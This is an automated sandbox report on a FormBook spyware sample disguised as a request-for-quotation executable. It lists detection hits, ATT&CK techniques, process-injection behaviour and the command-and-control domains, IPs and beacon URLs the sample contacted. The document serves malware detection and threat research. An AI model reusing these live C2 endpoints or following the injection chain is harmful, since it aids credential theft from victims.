          Source: explorer.exe, 00000004.00000000.260542390.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 0000000D.00000002.521588226.0000000007180000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_004059FF GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.254539209.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.304861461.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.517835626.00000000047A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.257817339.0000000002160000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.516326886.0000000000120000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.305023643.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.1.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ-BCM 03122020.exe.2160000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ-BCM 03122020.exe.2160000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.254539209.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.304861461.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.517835626.00000000047A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.257817339.0000000002160000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.516326886.0000000000120000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.305023643.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.1.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ-BCM 03122020.exe.2160000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ-BCM 03122020.exe.2160000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery131Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 435309 Sample: RFQ-BCM 03122020.exe Startdate: 16/06/2021 Architecture: WINDOWS Score: 100 27 www.therios.net 2->27 29 www.angrybird23blog.com 2->29 47 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 6 other signatures 2->53 9 RFQ-BCM 03122020.exe 19 2->9         started        13 explorer.exe 2->13         started        signatures3 process4 dnsIp5 25 C:\Users\user\AppData\Local\...\System.dll, PE32 9->25 dropped 55 Maps a DLL or memory area into another process 9->55 16 RFQ-BCM 03122020.exe 9->16         started        31 www.venturivasiljevic.com 154.216.127.214, 49726, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 13->31 33 www.sitedesing.com 172.67.193.107, 49737, 80 CLOUDFLARENETUS United States 13->33 35 17 other IPs or domains 13->35 57 System process connects to network (likely due to code injection or exploit) 13->57 19 chkdsk.exe 13->19         started        file6 signatures7 process8 signatures9 37 Modifies the context of a thread in another process (thread injection) 16->37 39 Maps a DLL or memory area into another process 16->39 41 Sample uses process hollowing technique 16->41 43 Queues an APC in another process (thread injection) 16->43 45 Tries to detect virtualization through RDTSC time measurements 19->45 21 cmd.exe 1 19->21         started        process10 process11 23 conhost.exe 21->23         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          RFQ-BCM 03122020.exe21%VirustotalBrowse
          RFQ-BCM 03122020.exe22%ReversingLabsWin32.Spyware.Noon
          RFQ-BCM 03122020.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsuBF4B.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsuBF4B.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          13.2.chkdsk.exe.4675830.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          3.0.RFQ-BCM 03122020.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          2.2.RFQ-BCM 03122020.exe.2160000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          13.2.chkdsk.exe.5097960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          3.1.RFQ-BCM 03122020.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.RFQ-BCM 03122020.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.RFQ-BCM 03122020.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          2.0.RFQ-BCM 03122020.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File

          Domains

          SourceDetectionScannerLabelLink
          www.sitedesing.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://sitedesing.com/images/Asset0%Avira URL Cloudsafe
          http://www.slingshotart.com/um8e/?4h=+OafPWEw6Z0Z/R6BCooy8AJa5dJFYQpN1/QWnuYdhiYhG0yayK8Tfl0bClCAF0vxrCxk&z6AhC6=4h0836-hg0%Avira URL Cloudsafe
          www.jiltedowl.com/um8e/0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://sitedesing.com/404/0%Avira URL Cloudsafe
          http://www.jiltedowl.com/um8e/?4h=KKIQ4+/JXGLy+NPKOmU9hT636Guj5rKZNfTWQVYkTfV7RhYYbHnV1SAJBWZXUUxQase4&z6AhC6=4h0836-hg0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://sitedesing.com/404.html/index.xml0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.vicdux.life/um8e/?4h=xbMoviQlEnjsHrEbTPTiLAbjABxJdIVdbR0FO8anDWX5sWiRIQHIKvYrn6XTqKSl/tf+&z6AhC6=4h0836-hg0%Avira URL Cloudsafe
          http://www.influenced-brands.com/um8e/?4h=OS+4PEF1Ll0k0ag4LLFRlEV4qtlkwOP7xXHx1u8kCQ7qmPGCq8FzaBf5dHjLd1oRWXdL&z6AhC6=4h0836-hg0%Avira URL Cloudsafe
          http://www.themiamadison.com/um8e/?4h=NkJAbAW12eli3K5LHnKsR+Euvd9TZZ9XHnn7bgS23Br3geXrqL1EBTSK/IXVH0nBwn3R&z6AhC6=4h0836-hg0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.lippocaritahotel.com/um8e/?4h=jQU7CxI2ATQsp+gAQw0922hAeD0Z0/nKIEFQeuBuNEOev1XtQ7gaXUtk4Kl0GHqLnKhz&z6AhC6=4h0836-hg0%Avira URL Cloudsafe
          http://www.sitedesing.com/um8e/?4h=5AA2OBt9f+luPmvaEKU5k+Cesx0roAkoENQvosg49Q0qMzSHjZ+2qPqQ9q6NL9KFhBoB&z6AhC6=4h0836-hg0%Avira URL Cloudsafe
          http://www.venturivasiljevic.com/um8e/?4h=Yr1O9d2lyD9rL0BsR5AOXBjd9Tt7L5u6HmDWn6NeMbq+6FaKs7VlSuQ+xmgdPYl8Ubqc&z6AhC6=4h0836-hg0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.venturivasiljevic.com
          		154.216.127.214
          		truetrue
            		unknown
            s.multiscreensite.com
            		100.24.208.97
            		truefalse
              		high
              jiltedowl.com
              		34.102.136.180
              		truefalse
                		unknown
                themiamadison.com
                		192.0.78.24
                		truetrue
                  		unknown
                  www.sitedesing.com
                  		172.67.193.107
                  		truetrueunknown
                  slingshotart.com
                  		34.102.136.180
                  		truefalse
                    		unknown
                    pixie.porkbun.com
                    		44.227.65.245
                    		truefalse
                      		high
                      lippocaritahotel.com
                      		103.28.148.178
                      		truetrue
                        		unknown
                        influenced-brands.com
                        		34.102.136.180
                        		truefalse
                          		unknown
                          www.angrybird23blog.com
                          		104.252.53.222
                          		truetrue
                            		unknown
                            www.lippocaritahotel.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.jiltedowl.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.influenced-brands.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.vicdux.life
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.themiamadison.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.top1opp.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.therios.net
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.slingshotart.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.yorkshirebridalmakeup.info
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.helpushelpothersstore.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.saddletaxweigh.info
                                                		unknown
                                                		unknowntrue
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.slingshotart.com/um8e/?4h=+OafPWEw6Z0Z/R6BCooy8AJa5dJFYQpN1/QWnuYdhiYhG0yayK8Tfl0bClCAF0vxrCxk&z6AhC6=4h0836-hgfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  www.jiltedowl.com/um8e/true
                                                  • Avira URL Cloud: safe
                                                  		low
                                                  http://www.jiltedowl.com/um8e/?4h=KKIQ4+/JXGLy+NPKOmU9hT636Guj5rKZNfTWQVYkTfV7RhYYbHnV1SAJBWZXUUxQase4&z6AhC6=4h0836-hgfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.vicdux.life/um8e/?4h=xbMoviQlEnjsHrEbTPTiLAbjABxJdIVdbR0FO8anDWX5sWiRIQHIKvYrn6XTqKSl/tf+&z6AhC6=4h0836-hgtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.influenced-brands.com/um8e/?4h=OS+4PEF1Ll0k0ag4LLFRlEV4qtlkwOP7xXHx1u8kCQ7qmPGCq8FzaBf5dHjLd1oRWXdL&z6AhC6=4h0836-hgfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.themiamadison.com/um8e/?4h=NkJAbAW12eli3K5LHnKsR+Euvd9TZZ9XHnn7bgS23Br3geXrqL1EBTSK/IXVH0nBwn3R&z6AhC6=4h0836-hgtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.lippocaritahotel.com/um8e/?4h=jQU7CxI2ATQsp+gAQw0922hAeD0Z0/nKIEFQeuBuNEOev1XtQ7gaXUtk4Kl0GHqLnKhz&z6AhC6=4h0836-hgtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.sitedesing.com/um8e/?4h=5AA2OBt9f+luPmvaEKU5k+Cesx0roAkoENQvosg49Q0qMzSHjZ+2qPqQ9q6NL9KFhBoB&z6AhC6=4h0836-hgtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.venturivasiljevic.com/um8e/?4h=Yr1O9d2lyD9rL0BsR5AOXBjd9Tt7L5u6HmDWn6NeMbq+6FaKs7VlSuQ+xmgdPYl8Ubqc&z6AhC6=4h0836-hgtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.comexplorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                        		high
                                                        https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.csschkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://sitedesing.com/images/Assetchkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.tiro.comexplorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://nsis.sf.net/NSIS_ErrorErrorRFQ-BCM 03122020.exefalse
                                                                  		high
                                                                  http://www.goodfont.co.krexplorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://sitedesing.com/404/chkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.carterandcone.comlexplorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://sitedesing.com/404.html/index.xmlchkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.typography.netDexplorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://fontfabrik.comexplorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      http://nsis.sf.net/NSIS_ErrorRFQ-BCM 03122020.exefalse
                                                                        		high
                                                                        https://opensource.keycdn.com/fontawesome/4.7.0/font-awesome.min.csschkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.fonts.comexplorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                                              		high
                                                                              http://www.sandoll.co.krexplorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://www.sakkal.comexplorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://cdnjs.cloudflare.com/ajax/libs/lunr.js/0.7.2/lunr.min.jschkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmpfalse
                                                                                		high

                                                                                Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                100.24.208.97
                                                                                		s.multiscreensite.comUnited States
                                                                                		14618AMAZON-AESUSfalse
                                                                                192.0.78.24
                                                                                		themiamadison.comUnited States
                                                                                		2635AUTOMATTICUStrue
                                                                                103.28.148.178
                                                                                		lippocaritahotel.comIndonesia
                                                                                		58477ARGON-AS-IDArgonDataCommunicationIDtrue
                                                                                34.102.136.180
                                                                                		jiltedowl.comUnited States
                                                                                		15169GOOGLEUSfalse
                                                                                154.216.127.214
                                                                                		www.venturivasiljevic.comSeychelles
                                                                                		132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                                                172.67.193.107
                                                                                		www.sitedesing.comUnited States
                                                                                		13335CLOUDFLARENETUStrue
                                                                                44.227.65.245
                                                                                		pixie.porkbun.comUnited States
                                                                                		16509AMAZON-02USfalse

                                                                                General Information

                                                                                Joe Sandbox Version:32.0.0 Black Diamond
                                                                                Analysis ID:435309
                                                                                Start date:16.06.2021
                                                                                Start time:11:54:20
                                                                                Joe Sandbox Product:CloudBasic
                                                                                Overall analysis duration:0h 10m 7s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:light
                                                                                Sample file name:RFQ-BCM 03122020.exe
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                Number of analysed new started processes analysed:28
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • HDC enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.evad.winEXE@7/3@14/7
                                                                                EGA Information:Failed
                                                                                HDC Information:
                                                                                • Successful, ratio: 25.4% (good quality ratio 23.6%)
                                                                                • Quality average: 77.8%
                                                                                • Quality standard deviation: 28.9%
                                                                                HCA Information:
                                                                                • Successful, ratio: 90%
                                                                                • Number of executed functions: 0
                                                                                • Number of non-executed functions: 0
                                                                                Cookbook Comments:
                                                                                • Adjust boot time
                                                                                • Enable AMSI
                                                                                • Found application associated with file extension: .exe
                                                                                Warnings:
                                                                                Show All
                                                                                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 40.88.32.150, 23.211.6.115, 104.43.193.48, 13.64.90.137, 23.211.4.86, 20.82.209.183, 51.103.5.159, 13.107.4.50, 20.82.210.154, 40.112.88.60, 80.67.82.211, 80.67.82.235
                                                                                • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, Edge-Prod-FRA.env.au.au-msedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, afdap.au.au-msedge.net, skypedataprdcolcus15.cloudapp.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, au.au-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, au.c-0001.c-msedge.net
                                                                                • Not all processes where analyzed, report is missing behavior information

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                No simulations

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                100.24.208.97SKMBT_C224307532DL23457845_Product Order doc.exeGet hashmaliciousBrowse
                                                                                • www.theruthyfoundation.com/ftgq/?C48xf8=VFQ8p8YH&8p=hXrrV6KmgNDYgaMusCisUpQaeMuXCQm/wDS3W/8bIiU7O/afikPnTfdtGvQUzT0iCOule4rqgA==
                                                                                2a#U062c.exeGet hashmaliciousBrowse
                                                                                • www.theruthyfoundation.com/ftgq/?LZNd=hXrrV6KmgNDYgaMusCisUpQaeMuXCQm/wDS3W/8bIiU7O/afikPnTfdtGs89wTIaLtbz&MnZ=bjoxsdeh2XJx3v
                                                                                New Order.exeGet hashmaliciousBrowse
